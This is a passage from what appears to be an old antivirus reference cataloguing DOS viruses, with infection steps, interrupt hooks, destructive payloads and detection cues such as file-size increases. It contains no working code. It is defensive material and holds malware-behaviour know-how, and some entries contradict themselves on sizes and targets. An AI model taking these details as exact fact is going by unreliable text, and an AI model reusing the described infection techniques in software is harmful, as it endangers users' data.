  5130. 3) With itself loaded resident into memory it will infect any
  5131.     uninfected file that is executed.
  5132.  
  5133. Damage: The virus has bugs in itself (Error in calculating entry
  5134. point). So some infected EXE files can't be executed correctly.
  5135.  
  5136. Detection method: Increase in infected file size by 1686 bytes.
  5137.  
  5138. Note:  Loads itself resident in memory.  An error message appears if
  5139. there is an I/O error (such as write protect).
  5140.  
  5141. [NCU_LI]
  5142. Virus Name: NCU_Li
  5143. Other names: None
  5144. Virus Type: File Virus
  5145. Virus Length: 1690/1670 bytes
  5146. PC Vectors Hooked: Int 21
  5147.  
  5148. Execution Procedure:
  5149. 1) The virus checks whether it is already loaded resident in memory.
  5150.     If "No", it then loads itself resident into memory by hooking INT
  5151.     21h.
  5152. 2) It then executes the original file.
  5153. 3) With itself loaded resident into memory it will infect any
  5154.     uninfected file that is executed.
  5155.  
  5156. Damage: None
  5157.  
  5158. Detection method: Increase infected files size by 1690/1670 bytes.
  5159.  
  5160. Note: Loads itself  resident in memory.  An error message appears if
  5161. there is an I/O error (such as write protect).
  5162.  
  5163. [Ghost-A]
  5164. Virus Name: GHOST-A
  5165. Other names: None
  5166. Virus Type: File Virus
  5167. Virus Length: 330 bytes
  5168.  
  5169. Execution Procedure:
  5170. 1) The virus checks whether it is already loaded resident in memory.
  5171.     If "No", it then loads itself resident into memory by hooking INT
  5172.     21h.
  5173. 2) It then executes the original file.
  5174. 3) With itself loaded resident into memory it will infect any
  5175.     uninfected file that is executed.
  5176.  
  5177. Damage: The executed file will be deleted after the virus has resided
  5178. in the memory and the system date is Friday. Virus then halts the
  5179. system.
  5180.  
  5181. Detection method: Increase in infected file size by 330 bytes.
  5182.  
  5183. Note:
  5184. 1) Loads itself resident in memory.  An error message appears if
  5185.     there is an I/O error (such as write protect).
  5186.  
  5187. [VVF34]
  5188. Virus Name: VVF34
  5189. Other names: None
  5190. Virus Type: File Virus
  5191. Virus Length: 1614-1624 bytes (EXE), 1614 bytes (COM)
  5192.  
  5193. Execution Procedure:
  5194. 1) The virus checks whether it is already loaded resident in memory.
  5195.     If "No", it then loads itself resident into memory by hooking INT
  5196.     21h.
  5197. 2) It then executes the original file.
  5198. 3) With itself loaded resident into memory it will infect any
  5199.     uninfected file that is executed.
  5200.  
  5201. Damage: The virus hooks 1Ch.  After the virus has resided in memory
  5202. for 5 minutes and 15 files have already been infected, the virus will
  5203. proceed to draw a portrait in the center of the screen.  The virus
  5204. will also hook interrupt 9h (keyboard interrupt). The virus will then
  5205. display the following message when the user presses any key: "Bu, Bu,
  5206. Bu..."
  5207.  
  5208. Detection method: Increases infected file size by 1614/1624 bytes.
  5209.  
  5210. Note:  Loads itself resident in memory.  An error message appears if
  5211. there is an I/O error (such as write protect).
  5212.  
  5213. [Damage-B]
  5214. Virus Name: DAMAGE-B
  5215. Other names: None
  5216. Virus Type: Parasitic Virus
  5217. Virus Length: 1110 bytes
  5218.  
  5219. Execution Procedure:
  5220. 1) The virus checks whether it is already loaded resident in memory.
  5221.     If "No", it then loads itself resident into memory by hooking INT
  5222.     21h.
  5223. 2) It then executes the original file.
  5224. 3) With itself loaded resident into memory it will infect any
  5225.     uninfected file that is executed.
  5226.  
  5227. Damage: Virus checks the system date.  If it is Tuesday, it will format
  5228. the hard disk.
  5229.  
  5230. Detection method: Increases infected file size by 1110 bytes.
  5231.  
  5232. Note:  Loads itself resident in memory.  An error message appears if
  5233. there is an I/O error (such as write protect).
  5234.  
  5235. [Fam1]
  5236. Virus Name: FAM1
  5237. Other names: None
  5238. Virus Type: File Virus
  5239. Virus Length: 1063 bytes
  5240.  
  5241. Execution Procedure:
  5242. 1) The virus checks whether it is already loaded resident in memory.
  5243.     If "No", it then loads itself resident into memory by hooking INT
  5244.     21h.
  5245. 2) It then executes the original file.
  5246. 3) With itself loaded resident into memory it will infect any
  5247.     uninfected file that is executed.
  5248.  
  5249. Damage: None
  5250.  
  5251. Detection method: Increases infected file size by 1036 bytes.  This
  5252. only occurs with a MONO display card.
  5253.  
  5254. Note:  Loads itself resident in memory.  An error message appears if
  5255. there is an I/O error (such as write protect).
  5256.  
  5257. [Malaise]
  5258. Virus Name: MALAISE
  5259. Other names: None
  5260. Virus Type: File Virus
  5261. Virus Length: 1335/1365 bytes
  5262.  
  5263. Execution Procedure:
  5264. 1) The virus checks whether it is already loaded resident in memory.
  5265.     If "No", it then loads itself resident into memory by hooking INT
  5266.     21h.
  5267. 2) It then executes the original file.
  5268. 3) With itself loaded resident into memory it will infect any
  5269.     uninfected file that is executed.
  5270.  
  5271. Damage: None
  5272.  
  5273. Detection method: Increases infected files size by 1335-1365 bytes.
  5274.  
  5275. Note:  Loads itself resident in memory.  An error message appears if
  5276. there is an I/O error (such as write protect).
  5277.  
  5278. [Walker]
  5279. Virus Name: WALKER
  5280. Other names: None
  5281. Virus Type: File Virus
  5282. Virus Length: 3845 bytes (EXE), 3852 bytes (COM)
  5283.  
  5284. Execution Procedure:
  5285. 1) The virus checks whether it is already loaded resident in memory.
  5286.     If "No", it then loads itself resident into memory by hooking
  5287.     INT 21h.
  5288. 2) It then executes the original file.
  5289. 3) With itself loaded resident into memory it will infect any
  5290.     uninfected file that is executed.
  5291.  
  5292. Damage: None
  5293.  
  5294. Detection method: Interrupt 16 will be hooked. A man walking across
  5295. the screen for the duration of 14 seconds will occasionally be
  5296. displayed. Increases infected file size by 3845/3852 bytes.
  5297.  
  5298. Note:  Loads itself resident in memory. An error message appears if
  5299. there is an I/O error (such as write protect).
  5300.  
  5301. [Proto-T]
  5302. Virus Name: PROTO-T
  5303. Other names: None
  5304. Virus Type: File Virus
  5305. Virus Length: 695 bytes (COM)
  5306.  
  5307. Execution Procedure:
  5308. 1) The virus checks whether it is already loaded resident in memory. If
  5309.     "No", it then loads itself resident into memory by hooking INT
  5310.     21h.
  5311. 2) It then executes the original file.
  5312. 3) With itself loaded resident into memory it will infect any
  5313.     uninfected file that is executed.
  5314.  
  5315. Damage: None
  5316.  
  5317. Detection method: Increases infected files size by 695 bytes.
  5318.  
  5319. Note:  Loads itself resident in memory.  An error message appears if
  5320. there is an I/O error (such as write protect).
  5321.  
  5322. [QMU]
  5323. Virus Name: QMU
  5324. Other names: None
  5325. Virus Type: Multi-partite Virus
  5326. Virus Length: 1513 bytes (COM)
  5327.  
  5328. Execution Procedure:
  5329. 1) The virus checks whether it is already loaded resident in memory.
  5330.     If "No", it then loads itself resident into memory by hooking
  5331.     INT 21h.
  5332. 2) It then executes the original file.
  5333. 3) With itself loaded resident into memory it will infect any
  5334.     uninfected file that is executed.
  5335.  
  5336. Damage: Hard disk cannot be booted after the virus internal counter
  5337. reaches 100.
  5338.  
  5339. Detection method: Increases infected file size by 1513 bytes.
  5340.  
  5341. Note:  Loads itself resident in memory.  An error message appears if
  5342. there is an I/O error (such as write protect).
  5343.  
  5344. [492]
  5345. Virus Name: 492
  5346. Other names: None
  5347. Virus Type: File Virus
  5348. Virus Length: 492 bytes (COM)
  5349.  
  5350. Execution Procedure:
  5351. 1) The virus checks whether it is already loaded resident in memory.
  5352.     If "No", it then loads itself resident into memory by hooking INT
  5353.     21h.
  5354. 2) It then executes the original file.
  5355. 3) With itself loaded resident into memory it will infect any
  5356.     uninfected file that is executed.
  5357.  
  5358. Damage: Virus will check the system date. If it is the 14th day of
  5359. the month and it is a Saturday, the virus will erase all data on the
  5360. hard disk.
  5361.  
  5362. Detection method: Increases infected file size by 492 bytes.
  5363.  
  5364. Note: Loads itself resident in memory.  An error message appears if
  5365. there is an I/O error (such as write protect).
  5366.  
  5367. [Reaper]
  5368. Virus Name: REAPER
  5369. Other names: None
  5370. Virus Type: File Virus
  5371. Virus Length: 1072 bytes
  5372.  
  5373. Execution Procedure:
  5374. 1) The virus checks whether it is already loaded resident in memory. If
  5375.     "No", it then loads itself resident into memory by hooking INT 21h.
  5376. 2) It then executes the original file.
  5377. 3) With itself loaded resident into memory it will infect any
  5378.     uninfected file that is executed.
  5379.  
  5380. Damage: The Reaper virus will check the system date after it resides in
  5381. memory. If it is Aug 21, the virus will display the following message:
  5382. "Reaper Man. (c) 92, Apache Warrior, ARCV Pres."
  5383.  
  5384. Detection method: Increases infected file size by 1072 bytes.
  5385.  
  5386. Note: Loads itself resident in memory.  An error message appears if
  5387. there is an I/O error (such as write protect).
  5388.  
  5389. [Jump4Joy]
  5390. Virus Name: JUMP4JOY
  5391. Other names: None
  5392. Virus Type: File Virus
  5393. Virus Length: 1273 bytes (COM)
  5394.  
  5395. Execution Procedure:
  5396. 1) The virus checks whether it is already loaded resident in memory.
  5397.     If "No", it then loads itself resident into memory by hooking
  5398.     INT 21h.
  5399. 2) It then executes the original file.
  5400. 3) With itself loaded resident into memory it will infect any
  5401.     uninfected file that is executed. b) It doesn't infect .EXE files.
  5402.  
  5403. Damage: None
  5404.  
  5405. Detection method: Increases infected file size by 1273 bytes.
  5406.  
  5407. Note:  Loads itself resident in memory.  An error message appears if
  5408. there is an I/O error (such as write protect).
  5409.  
  5410. [Aragorn]
  5411. Virus Name: ARAGORN
  5412. Other names: None
  5413. Virus Type: Boot Strap Sector Virus
  5414. Damage: None
  5415.  
  5416. Infection method: Only floppy diskette in drive A will be infected.
  5417.  
  5418. [Trash]
  5419. Virus Name: TRASH
  5420. Other names: None
  5421. Virus Type: Boot Strap Sector Virus
  5422. Virus Length: 1241 bytes
  5423.  
  5424. Damage: Virus will overwrite the Partition Table.
  5425.  
  5426. Detection method: Virus will not infect any files. Virus will display
  5427. the following message: "Warning!!!  This program will zero (DESTROY)
  5428. the master boot record of your first hard disk. The purpose of this is
  5429. to test the anti-virus software, so be sure you have installed your
  5430. favorite protecting program before running this one!  It is almost
  5431. certain that it will fail to protect you anyway. Press any key to abort,
  5432. or press Ctrl-Alt-Right Shift- F5 to proceed at your own risk." Virus
  5433. will proceed to overwrite the Partition Table if user presses
  5434. Ctrl-Alt-Right Shift-F5.
  5435.  
  5436. [Data Crime]
  5437. Virus Name: Datacrime
  5438. Other names: 1168, Columbus Day
  5439. Virus Type: File Virus
  5440. Virus Length: 1168 bytes
  5441.  
  5442. Execution Procedure:
  5443. 1) The virus checks whether it is already loaded resident in memory. If
  5444.     "No", it then loads itself resident into memory by hooking INT 21h.
  5445. 2) It then executes the original file.
  5446. 3) With itself loaded resident into memory it will infect any
  5447.     uninfected file that is executed. b) It doesn't infect .EXE files.
  5448.  
  5449. Damage: Virus will low-level format your hard disk after October 12.
  5450.  
  5451. Detection method: Virus infects all .COM files between April 1st-October
  5452. 12th.  After October 12th, it  will display the following message:
  5453. "DATACRIME VIRUS Released:1 March 1989." It will then low-level format
  5454. your hard disk.
  5455.  
  5456. Note:  Loads itself resident in memory.  An error message appears if
  5457. there is an I/O error (such as write protect).
  5458.  
  5459. [Datacrime II]
  5460. Virus Name: Datacrime II
  5461. Other names: None
  5462. Virus Type: File Virus
  5463. Virus Length: Increases .COM and .EXE files by 1514 bytes.
  5464.  
  5465. Damage: Virus will low-level format cylinder 0 of your hard disk
  5466. after October 12.
  5467.  
  5468. Detection method: Between October 12th-31st, excluding Mondays, the
  5469. virus will display the following message: "DATACRIME-2 VIRUS."  The
  5470. virus will proceed to low-level format cylinder  0 of the hard disk.
  5471. Then the system will hang.
  5472.  
  5473. [Marauder]
  5474. Virus Name: Marauder
  5475. Other names: None
  5476. Virus Type: File Virus
  5477. Virus Length: Increases .COM file by 860 bytes.
  5478.  
  5479. Execution Procedure:
  5480. 1) The virus searches the current directory for a .COM file.  Once it
  5481.     locates a file it checks whether it is already infected by the
  5482.     Marauder virus. If "No", it then infects the file.
  5483. 2) If "Yes" then it searches for another .COM file to infect. b) It
  5484.     doesn't infect .EXE files.
  5485. 3) It then executes the original file.
  5486.  
  5487. Damage: The Marauder virus will overwrite your files every February 2
  5488. with the string "=[Marauder] 1992 Hellraiser -Phalcon/Skism."
  5489.  
  5490. Detection method: When the infected file is executed, the virus will
  5491. infect the first uninfected .COM file in the current directory.
  5492. Every February 2, the virus will overwrite all executed files by
  5493. following characters one by one "=[Aarauder] 1992 Hellraiser -
  5494. Phalcon/skism."
  5495.  
  5496. [Oropax]
  5497. Virus Name: Oropax
  5498. Other names: None
  5499. Virus Type: File Virus
  5500. Virus Length: 2756-2800 bytes
  5501.  
  5502. Execution Procedure:
  5503. 1) The virus checks whether it is already loaded resident in memory.
  5504.     If "No", it then loads itself resident into memory by hooking
  5505.     INT 21h.
  5506. 2) It then executes the original file.
  5507. 3) With itself loaded resident into memory it will infect any
  5508.     uninfected file that is executed. b) It doesn't infect .EXE files.
  5509.  
  5510. Damage: Infected .COM file sizes increase by 2756-2800 bytes.
  5511.  
  5512. Detection method: Virus will hook interrupt 20h, 21h, 27h. If the
  5513. system date is after May 1, 1987 and it is an IBM-compatible computer,
  5514. interrupt 8h will be hooked. When the virus is triggered, it will play
  5515. the "Stars", "Blue" and "Forty" songs one by one every eight minutes.
  5516.  
  5517. Note:  Loads itself resident in memory.  An error message appears if
  5518. there is an I/O error (such as write protect).
  5519.  
  5520. [dBASE]
  5521. Virus Name: dBASE
  5522. Other names: None
  5523. Virus Type: File Virus
  5524. Virus Length: 1864 bytes
  5525.  
  5526. Execution Procedure:
  5527. 1) The virus checks whether it is already loaded resident in memory. If
  5528.     "No", it then loads itself resident into memory by hooking INT
  5529.     21h.
  5530. 2) It then executes the original file.
  5531. 3) With itself loaded resident into memory it will infect any
  5532.     uninfected file that is executed. b) It doesn't infect .EXE files.
  5533.  
  5534. Damage: Every executed .COM file increases by 1864 bytes. Virus will
  5535. sometimes cause system to halt.
  5536.  
  5537. Detection method: Virus will hook interrupt 21h. When the virus is
  5538. activated, it will switch high-byte and low-byte of every opened .DBF
  5539. data files.  Virus will also create a hidden file - "BUG.DAT" in the
  5540. root directory of every infected .DBF file name.
  5541.  
  5542. Note:  Loads itself resident in memory.  An error message appears if
  5543. there is an I/O error (such as write protect).
  5544.  
  5545. [Halloween]
  5546. Virus Name: Halloween
  5547. Other names: Happy Halloween
  5548. Virus Type: File Virus
  5549. Virus Length: N/A
  5550.  
  5551. Execution Procedure:
  5552. 1) The virus checks whether it is already loaded resident in memory. If
  5553.     "No", it then loads itself resident into memory by hooking INT 21h.
  5554. 2) It then executes the original file.
  5555. 3) With itself loaded resident into memory it will infect any
  5556.     uninfected file that is executed.
  5557.  
  5558. Damage: Virus finds an executable file (first .EXE file then .COM) in
  5559. current directory and proceeds to infect it.  It will display "Runtime
  5560. error 002 at 0000:0511" on screen if no uninfected files are found.
  5561.  
  5562. Detection method: Every Oct 31, the virus will create a 10KB-long file
  5563. and display "Runtime error 150 at 0000:0AC8."
  5564.  
  5565. Note:
  5566. 1) Loads itself resident in memory.  An error message appears if
  5567.     there is an I/O error (such as write protect).
  5568.  
  5569. [Kennedy]
  5570. Virus Name: Kennedy
  5571. Other names: None
  5572. Virus Type: File Virus
  5573. Virus Length: 333 bytes
  5574.  
  5575. Execution Procedure:
  5576. 1) The virus checks whether it is already loaded resident in memory. If
  5577.     "No", it then loads itself resident into memory by hooking INT 21h.
  5578. 2) It then executes the original file.
  5579. 3) With itself loaded resident into memory it will infect any
  5580.     uninfected file that is executed.
  5581.  
  5582. Damage: Virus destroys FAT.
  5583.  
  5584. Detection method: On June 6, November 8, and November 22, the virus
  5585. will display the following message:
  5586.  
  5587.     "Kennedy is dead - long live the Dead Kennedys."
  5588.  
  5589. Virus proceeds to destroy FAT.
  5590.  
  5591. Note:  Loads itself resident in memory.  An error message appears if
  5592. there is an I/O error (such as write protect).
  5593.  
  5594. [Virus-90]
  5595. Virus Name: Virus-90
  5596. Other names: None
  5597. Virus Type: File Virus
  5598. Virus Length: 857 bytes (COM)
  5599.  
  5600. Execution Procedure:
  5601. 1) The virus checks whether it is already loaded resident in memory.
  5602.     If "No", it then loads itself resident into memory by hooking
  5603.     INT 21h.
  5604. 2) It then executes the original file.
  5605. 3) With itself loaded resident into memory it will infect any
  5606.     uninfected file that is executed. b) It doesn't infect .EXE
  5607.     files.
  5608.  
  5609. Damage: Infected .COM files increase by 857 bytes.
  5610.  
  5611. Detection method: Virus displays "Infected" when a file gets infected.
  5612.  
  5613. Note:
  5614. 1) Loads itself resident in memory.  An error message appears if
  5615.     there is an I/O error (such as write protect).
  5616.  
  5617. [Lehigh]
  5618. Virus Name: Lehigh
  5619. Other names: None
  5620. Virus Type: Parasitic Virus (infects COMMAND.COM only)
  5621. Virus Length: 555 bytes
  5622.  
  5623. Execution Procedure:
  5624. 1) The virus checks whether it is already loaded resident in memory.
  5625.     If "No", it then loads itself resident into memory by hooking
  5626.     INT 21h.
  5627. 2) Then when a disk is accessed and if COMMAND.COM is uninfected it
  5628.     will immediately infect it and execute the original file.
  5629. 3) With itself loaded resident into memory it checks for any
  5630.     uninfected file that is executed.  b) It doesn't infect .EXE
  5631.     files.
  5632.  
  5633. Damage:
  5634. 1) Infects the disk's COMMAND.COM file and increases its size by
  5635.     555 bytes.
  5636. 2) When the infection count is more than four the current disk will
  5637.     be trashed.
  5638.  
  5639. [Como]
  5640. Virus Name: Como
  5641. Virus Type: File Virus
  5642. Virus Length: 2,020/2,030 bytes (EXE)
  5643. PC Vectors Hooked:  None
  5644.  
  5645. Execution Procedure:
  5646. 1) It searches for an EXE file in the current directory.
  5647. 2) Then it checks if the file has been infected. If Yes", it continues
  5648.     to search.
  5649. 3) If an uninfected file is found, there is 50% probability for the
  5650.     file to get infected.
  5651.  
  5652. Infection Procedure:
  5653. 1) The virus infects files by AH=4B in INT 21h. When running an
  5654.     uninfected program, the program will get infected.
  5655. 2) Before infecting files, the virus displays: "It's your task to find
  5656.     and delete them, best wishes. Press a key to execute the prompt."
  5657.  
  5658. Damage:  None
  5659.  
  5660. Detection method:  Check if the file length increases by 2,020/2,030
  5661. bytes.
  5662.  
  5663. Remarks:
  5664. 1) Non memory resident.
  5665. 2) Before infecting files, the virus hooks INT 24h in order to omit
  5666.     the I/O error messages.
  5667.  
  5668. [512]
  5669. Virus Name: 512
  5670. Virus Type: File Virus
  5671. Virus Length: 512 bytes
  5672. Symptoms: None
  5673.  
  5674. Execution Procedure: Virus does not contain any damage routine,
  5675. but its spreading mechanism presents a great danger to the
  5676. infected file. The beginning is saved outside the file in free
  5677. space in the allocated cluster.  When copying such a program,
  5678. this part is not copied together with the rest of the file,
  5679. causing the original program to be destroyed.
  5680.  
  5681. Other manifested problems to files are: when an infected file is
  5682. read with the virus already in the memory, it tests as a virus
  5683. flag only the time of the last modification (62 seconds) and not
  5684. the actual file content.  The same virus flag is used by viruses
  5685. 648 and 1560 and some users have their programs immunized
  5686. against virus 648.  The result is that, the nonsense data which
  5687. lies at the end of an infected file will be read rather than the
  5688. actual file content.
  5689.  
  5690. [744]
  5691. Virus Name: 744
  5692. Virus Type: Parasitic Virus
  5693. Virus Length: 744 bytes
  5694.  
  5695. Symptoms: Increases infected file sizes by 744 bytes. Destroyed
  5696. programs will cause computer to crash in most cases.
  5697.  
  5698. Damage: With the probability of 1:7 the virus will not infect
  5699. other files but will destroy the founded file.  Virus writes the
  5700. instruction JMP [BP+0] at the start of program. Virus contains an
  5701. error. It should write JMP F000:FFF0 instruction (computer
  5702. reboot - same as virus 648), which is 4 bytes from the actually
  5703. written instruction. Length of destroyed program is not changed.
  5704. This program contains a virus flag. Reads and writes using DOS
  5705. interrupts.  When virus finds a program which can be infected, it
  5706. reads and without any change writes to sector number  1 (FAT
  5707. area).  This is not done on the disk C:. It is done as a test
  5708. whether the disk is write protected or not.
  5709.  
  5710. [1800]
  5711. Virus Name: 1800
  5712. Other Names: Bulgarian virus, Sofia virus, Dark Avenger Virus
  5713. Type: Parasitic Virus
  5714. Virus Length: cca 1800 bytes
  5715.  
  5716. Symptoms: Increases infected file sizes by cca 1800 bytes (in the
  5717. case of EXE files it performs paragraph alignment).  Decreases
  5718. size of free RAM memory. Infected files contain the following
  5719. strings:
  5720.  
  5721.     "Eddie lives...somewhere in time!", "Diana P." a "This
  5722.      program was written in the city of Sofia (C) 1988-89 Dark
  5723.      Avenger."
  5724.  
  5725. Damage: Virus reads boot sector of the disk, and in it (offset
  5726. 10, OEM decimal version) marks the number of programs, which are
  5727. run from the given disk MOD 16.  If it is zero (after every 16
  5728. programs!!), it overwrites random cluster on the disk with part
  5729. of its own code.  The cluster number is then stored in the boot
  5730. sector at the position at offset 8 (OEM main version). Modifies
  5731. boot sector then writes back on the disk.
  5732.  
  5733.  
  5734. [V2000]
  5735. Virus Name: V2000
  5736. Other Names: 21 century virus
  5737. Virus Type: Parasitic Virus
  5738. Virus Length: 2000 bytes
  5739.  
  5740. Symptoms: Increases infected .COM and .EXE file sizes by 2000
  5741. bytes. Decreases size of free RAM memory by 4KB.  Infected files
  5742. contain the following strings:
  5743.  
  5744.     "(C) 1989 by Vesselin Bontchev"
  5745.  
  5746. Damage: None
  5747.  
  5748. [2343]
  5749. Virus Name: 2343
  5750. Other Names: Flip virus
  5751. Virus Type: Multi-partite Virus
  5752. Virus Length: 2343 bytes
  5753.  
  5754. Symptoms: Increases infected .COM and .EXE file sizes by 2343
  5755. bytes.  Decreases size of free RAM memory with 2864 bytes.  New
  5756. DOS function 0FE01h is implemented, when virus is active in
  5757. memory, it returns 01FEh in AX.  Word  028h in DPT sector
  5758. contains the value 0FE01h.  Flip virus has the same virus flag as
  5759. the viruses 648, 1560 (ALABAMA) and 512: it sets the number of
  5760. seconds in the file's time stamp to the nonsense value of 62.
  5761. Infected files contain the following strings:
  5762.  
  5763.     "OMICRON by PsychoBlast"
  5764.  
  5765. Damage: Under certain conditions virus "flips" the screen. If the
  5766. damage routine is active, virus contains bit reversed of screen
  5767. font 8*14 and monitors the interrupt 10h. When video mode is
  5768. changed to the mode 2 or 3 the special routine for interrupt 1Ch
  5769. is activated. All other video modes are interrupt vector 1Ch  set
  5770. to IRET instruction.  For video modes 2 and 3, the video start
  5771. address is set to 1000h.  The memory at segment 0BA00h is used as
  5772. video memory rather than 0B800h.  On every call of interrupt 1Ch
  5773. (18.2 times per second) virus copies 500 words (characters and
  5774. their attributes) from memory segment 0B800h into memory segment
  5775. 0BA00h with inversion of rows and columns.
  5776.  
  5777. [Pojer]
  5778. Virus Name: Pojer
  5779. Virus Type: Parasitic Virus
  5780. Virus Length: Infected EXE and COM files increase by 1919 Bytes
  5781. PC Vectors Hooked: INT 21h and INT 24h
  5782.  
  5783. Execution Procedure:
  5784. 1) Checks whether it already resides in memory. If not, hooks INT
  5785.     21h and resides in the highest memory, and then executes the
  5786.     host program.
  5787. 2) If it already resides in the highest memory, the host program
  5788.     will be executed immediately
  5789.  
  5790. Infection Procedure:
  5791. 1) The virus infects files by AH=4B in INT 21h. The uninfected
  5792.     files will be infected when they are executed.
  5793. 2) Before infecting files Pojer will hook INT 24h in order to
  5794.     ignore the I/O errors.
  5795.  
  5796. Damage:  None
  5797.  
  5798. Detection method:  Detectable if the lengths of files increase
  5799. by 1919 Bytes.
  5800.  
  5801. [Drop]
  5802. Virus Name: Drop
  5803. Virus. Type: Parasitic Virus.
  5804. Virus Length: Infected EXE file sizes increase by 1130-1155
  5805.                      Bytes and COM files increase by 1131 Bytes.
  5806. PC Vectors Hooked:  INT 21h
  5807.  
  5808. Execution Procedure:
  5809. 1) Checks whether it resides in memory or not. If not, hooks INT
  5810.     21h and resides in the highest memory, and then executes the
  5811.     host program (If it already resides in the highest memory, the
  5812.     host program will be executed directly).
  5813. 2) Then checks system date.  It will hook INT 21h if the date is
  5814.     "the sixth day of the month". The characters on the screen
  5815.     will drop and the system will hang when any program is
  5816.     executed.
  5817.  
  5818. Infection Procedure:
  5819. 1) The virus infects files by AH=4B in INT 21h. The non-infected
  5820.     files will be infected  when they are executed.
  5821. 2) Before infecting files Drop will not hook INT 24h. The error
  5822.     information will appear when I/O errors occur.
  5823.  
  5824. Damage:  Refer to Execution Procedure 2).
  5825.  
  5826. Detection method:  Detectable if the lengths of files increase
  5827. by 1130-1155 Bytes.
  5828.  
  5829. [Ha]
  5830. Virus Name: Ha
  5831. Virus Type: Parasitic Virus
  5832. Virus Length: Infected EXE file sizes increase by 1458-1468 Bytes
  5833.                      and COM files increase by 1462 Bytes.
  5834. PC Vectors Hooked:  INT 21h
  5835.  
  5836. Execution Procedure:
  5837. 1) Detects whether it has resided in memory.  If not, hooks INT
  5838.     21h and resides in the highest memory, and then executes the
  5839.     host program.
  5840. 2) If it has already resided in the highest memory, the program
  5841.     will be executed directly.
  5842.  
  5843. Infection Procedure:  The virus infects files by AH=4B in INT 21h.
  5844. The uninfected files will be infected when they are executed.
  5845.  
  5846. Damage:  None
  5847.  
  5848. Detection method: Detectable if the lengths of files increase by
  5849. 1458-1468 Bytes.
  5850.  
  5851. [LCT]
  5852. Virus Name: Lct
  5853. Virus Type: Parasitic Virus
  5854. Virus Length: Infected COM file sizes increase by 599 Bytes
  5855. PC Vectors Hooked: None
  5856.  
  5857. Execution Procedure:
  5858. 1) Searches for a COM files in the current directory.
  5859. 2) The virus checks  whether the file is infected or not.  If the
  5860.     file has been infected, the virus continues to search until an
  5861.     uninfected file is found and  then infects it.  The virus
  5862.     stops searching until the last COM file in the current
  5863.     directory is infected.
  5864.  
  5865. Damage: The virus checks the system date. If the date is "the
  5866. 25th of Dec.", every time an infected file is executed, only
  5867. the virus codes in the infected file is executed. The program
  5868. then ends. The host programs are not executed.
  5869.  
  5870. Detection method:  Detectable if the lengths of files increase
  5871. by 599 Bytes.
  5872.  
  5873. Remarks:
  5874. 1) Non memory resident.
  5875. 2) When infecting files, the virus does not hook INT 24h.  And
  5876.     the error information appears when I/O errors occur.
  5877.  
  5878. [NPOX-Var]
  5879. Virus Name: Npox-var
  5880. Virus Type: Parasitic Virus
  5881. Virus Length: Infected COM file sizes increase by 1000 Bytes
  5882. PC Vectors Hooked: None
  5883.  
  5884. Execution Procedure:
  5885. 1) The virus searches for a COM file in the current directory.
  5886. 2) The virus checks whether the file is infected. If the file has
  5887.     been infected, the virus continues to search until an
  5888.     uninfected file is found and then infects it. (The virus
  5889.     only infects one file at a time.)
  5890.  
  5891. Damage: None
  5892.  
  5893. Detection method:  Detectable if the lengths of files increase by
  5894. 1000 Bytes.
  5895.  
  5896. Remarks:
  5897. 1) Non memory resident.
  5898. 2) When infecting files, the virus does not hook INT 24h.  And
  5899.     the error information appears when I/O errors occur.
  5900. 3) The beginning of the virus is:
  5901.      INC         BX
  5902.      PUSH        AX
  5903.      POP         AX
  5904.      DEC         BX
  5905.      JMP         XXXX
  5906.  
  5907. [Bur-560h]
  5908. Virus Name: Bur-560h
  5909. Virus Type: Parasitic Virus
  5910. Virus Length: Infected COM files do not increase (Does not
  5911.                      infect EXE files).
  5912. PC Vectors Hooked: None
  5913.  
  5914. Execution Procedure:
  5915. 1) The virus searches for COM files through the current path.
  5916. 2) The virus checks whether the file is infected. If the file has
  5917.     been infected, the virus continues to search until an
  5918.     uninfected file is found and then infects it (It only infects
  5919.     one file at a time).
  5920.  
  5921. Damage:
  5922. The virus infects the files by covering up the original files, so
  5923. the lengths of the files do not increase and the functions of the
  5924. original files can not be executed.
  5925.  
  5926. Remarks:
  5927. 1) Non memory resident.
  5928. 2) When infecting files, the virus does not hook INT 24h.  And
  5929.     the error information appears when I/O errors occur.
  5930.  
  5931. [Benoit]
  5932. Virus Name: Benoit
  5933. Virus Type: Parasitic Virus
  5934. Virus Length: Infected COM file sizes increase by 1183 bytes
  5935.                      (Does not infect EXE files).
  5936. PC Vectors Hooked:  INT 21h
  5937.  
  5938. Execution Procedure:
  5939. 1) After entering memory, it checks whether it resides in memory.
  5940.     If not, the virus hooks INT 21h and resides in the high memory
  5941.     and then runs the host program.
  5942. 2) If the virus already resides in memory, the host programs will
  5943.     be executed directly.
  5944.  
  5945. Infection Procedure:
  5946. 1) Infects the file by "AH=4B" in INT 21h. When an uninfected
  5947.     file is executed, it will be infected (Does not infect COM
  5948.     files).
  5949. 2) When infecting files, the virus does not hook INT 24h. The
  5950.     error information will appear when I/O errors occur.
  5951.  
  5952. Damage: None
  5953.  
  5954. Detection method: Detectable when the lengths of files increase
  5955. by 1183 bytes.
  5956.  
  5957. [Hallo]
  5958. Virus Name: Hallo
  5959. Virus Type: Parasitic Virus
  5960. Virus Length: Infected COM file sizes increase by 496 Bytes.
  5961.                      (Does not infect EXE files.)
  5962. PC Vectors Hooked: None
  5963.  
  5964. Execution Procedure:
  5965. 1) Searches for a COM file in the current disk.
  5966. 2) Checks whether the file is infected.  If yes, continues to
  5967.     search until an uninfected file is found and then infects it.
  5968.     (only infects one file at a time). After the file is infected,
  5969.     the virus displays
  5970.  
  5971.     "I have got a virus for you!".
  5972.  
  5973. Damage: None
  5974.  
  5975. Detection method:
  5976. See if the string "I have got a virus for you!" displays when
  5977. executing programs and if the lengths of files increase by 599
  5978. Bytes.
  5979.  
  5980. Remarks:
  5981. 1) Non memory resident.
  5982. 2) When infecting files, the virus does not hook INT 24h.  Error
  5983.     message will appear when I/O errors occur.
  5984.  
  5985. [Allerbmu]
  5986. Virus Name: Allerbmu
  5987. Virus Type: Parasitic Virus
  5988. Virus Length: Infected COM file sizes increase by 359 Bytes.
  5989.                      (Does not infect EXE files.)
  5990. PC Vectors Hooked: None
  5991.  
  5992. Execution Procedure:
  5993. 1) Searches for a COM file in the current directory.
  5994. 2) Checks whether the file is infected.  If yes, the virus
  5995.     continues to search.
  5996. 3) If an uninfected file is found, the virus will proceed to
  5997.     infect it. (The virus only infects one file at a time).
  5998. 4) Checks the system date no matter whether an uninfected COM
  5999.     file is found or not.  When the date is 'Monday', the virus
  6000.     destroys all files on the hard disk, and then displays the
  6001.     following message:
  6002.  
  6003.     "+ ALLERBMU NORI +(c) 1991........................"
  6004.  
  6005. Damage: Refer to Execution Procedure 4).
  6006.  
